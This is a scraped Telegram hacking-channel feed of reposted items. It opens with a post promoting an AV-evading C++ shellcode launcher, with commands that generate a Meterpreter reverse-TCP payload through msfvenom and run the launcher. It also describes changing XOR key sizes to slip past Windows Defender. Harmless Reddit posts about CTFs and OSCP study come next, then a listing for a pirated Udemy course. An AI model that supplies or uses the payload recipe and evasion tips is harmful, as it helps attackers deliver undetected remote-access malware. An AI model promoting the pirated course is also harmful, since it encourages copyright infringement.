Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
c++ fully undetected (https://www.kitploit.com/search/label/Undetected) shellcode launcher ;) releasing this to celebrate the birth of my newborn
description
13/05/2021: c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021. dynamic invoking of win32 api functions XOR encryption (https://www.kitploit.com/search/label/Encryption) of shellcode and function names randomised XOR keys and variables per run on Kali Linux, simply 'apt-get install mingw-w64*' and thats it! 17/05/2021: random strings length and XOR keys length
antiscan.me

___________________________
@hacking_Attack
@Hacking_Video
usage
git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py example: git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* cd charlotte msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py profit
tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike (https://www.kitploit.com/search/label/Cobalt%20Strike) raw format payload

___________________________
@hacking_Attack
@Hacking_Video
update v1.1
17/05/21: apparently Microsoft (https://www.kitploit.com/search/label/Microsoft) Windows Defender (https://www.kitploit.com/search/label/Windows%20Defender) was able to detect the .DLL binary, and how did they flag it? by looking for several XOR keys of 16 byte size changing it to 9 shown in the POC .gif below shows it is now undetected again cheers!

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Ctf

When doing ctf is it fine to not use a vm and just use a duaoboot with a vpn

submitted by /u/RyanHassanRU
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Best CTF website (for someone who already knows how to code)?

There are a lot of great resources on the sticky, which site (from that thread or elsewhere) would you suggest? I majored in computer engineering, so microcorruption caught my eye, but I was thinking that I should start with a more general purpose/higher level challenge set before focusing more on the embedded side.

submitted by /u/greenlion98
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
looking for someone to practice/study for oscp with.
https://www.reddit.com/r/Pentesting/comments/nix4bi/looking_for_someone_to_practicestudy_for_oscp_with/

<!-- SC_OFF -->Hi, i'm looking for someone who would want to study for the oscp course with me, maybe like doing hack the box together or something (ok...not specifically that, its just an example), im really open to suggestions for anything else, so feel free to give your own ideas; oh and btw im no expert in this stuff or anything lol, just started out in this field a few months ago, so im maybe just a level above noob :). If you are interested in studying together plz message me on telegram '@oniono12' or if you don't have it just message me here :) If you are studying for another course (not oscp), i would also gladly like to hack/chat together about this stuff, because learning alone is: much harder sometimes gets boring lol. Thanks for reading. ---note: I have not yet purchased the course, I am just preparing to take it, so don't think that I have lab access (just don't want to cause any misunderstandings) :| --- <!-- SC_ON --> submitted by /u/oniono12 (https://www.reddit.com/user/oniono12)
[link] (https://www.reddit.com/r/Pentesting/comments/nix4bi/looking_for_someone_to_practicestudy_for_oscp_with/) [comments] (https://www.reddit.com/r/Pentesting/comments/nix4bi/looking_for_someone_to_practicestudy_for_oscp_with/)
FreeCourseSite – Download Udemy Paid Courses For Free
Java Programming – The language and tools for beginners

Java Programming – The language and tools for beginnersLearn Java Programming and start building Java Applications with tools used in the industry.What you’ll learnJava Programming – The language and tools for beginners
*

You’ll learn the core Java language features and skills required to start developing in Java.
*

You’ll also learn programming fundamentals that can be applied in Java and in other programming languages.
*

Understand how to write Java Applications
*

Learn how to use some of the most common data structures in the Java Collections package.
*

Fundamentals of Object-Oriented Programming (OOP) – including inheritance, polymorphism, and others.
*

Understand what different options are available in Java for solving different problems, and learning how to decide what options to use depending on the Requirements*

A desire to learn and practice (we’ll have several practice exercises during the course!)
*

A computer where you can install Java and an IDE (we’ll provide instructions on how to install these as required) DescriptionEverything we do, we do it to help people develop their skills and start/advance in their careers so that we can all move forward one step at a time. One of the ways we are working on to fulfill that purpose is via this Java course.

In this course, you’ll learn how to program in Java. This course starts from scratch, so no previous knowledge of Java or programming is required.
Join us in this course, where we’ll cover everything you’ll need to start building Java applications. We hope the course helps you develop your skills and advance in your career.


From installing the tools, introducing the programming fundamentals that you’ll require to more advanced Java and OOP (Object-Oriented Programming) topics, we aim to provide you with all the foundations needed to become a Java developer. Our promise to you:* Provide you with quality content tailored for this course.
* Provide support if you get stuck. You can reach the student community and us via the communication channels we’ve set up for this course.
* Keep the content updated and keep adding new content to cover more topics related to the course.
* Offer a deep understanding of the different programming, OOP, and Java topics that we’ll cover.

What you’ll learn:

* Programming fundamentals that are transferrable to other programming languages.
* What are control flow statements and how to use them?
* Understand classes and objects in Java and their relationship to OOP.
* Understand the basics of Java, how to define fields, methods, constructors, and more.
* What data encapsulation is and how to ensure we’re hiding/preventing access to the data correctly.
* Additional fundamental OOP Concepts like inheritance and polymorphism and how they are used/implemented in Java.
* What are immutable objects, and how do design classes for immutable objects?
* Introduction to Data Structures in Java (e.g., Arrays and ArrayList).
* What are Generic classes/types and type parameters?
* … and more! Who this course is for:* From Students with no previous coding experience to Java developers that want to improve their Java skills.
* Java Developers that want to learn about some of the tools used in the industry.
* Developers that have already studied a different programming language and want to learn Java.
*
Last updated 4/2021
Content From: https://www.udemy.com/course/java-programming-the-language-and-tools-for-beginners/ Download Now Building a Web App with Angular Course
The post Java Programming – The language and tools for beginners appeared first on FreeCourseSite - Download Udemy Paid Courses For Free.

___________________________
@hacking_Attack
@Hacking_Video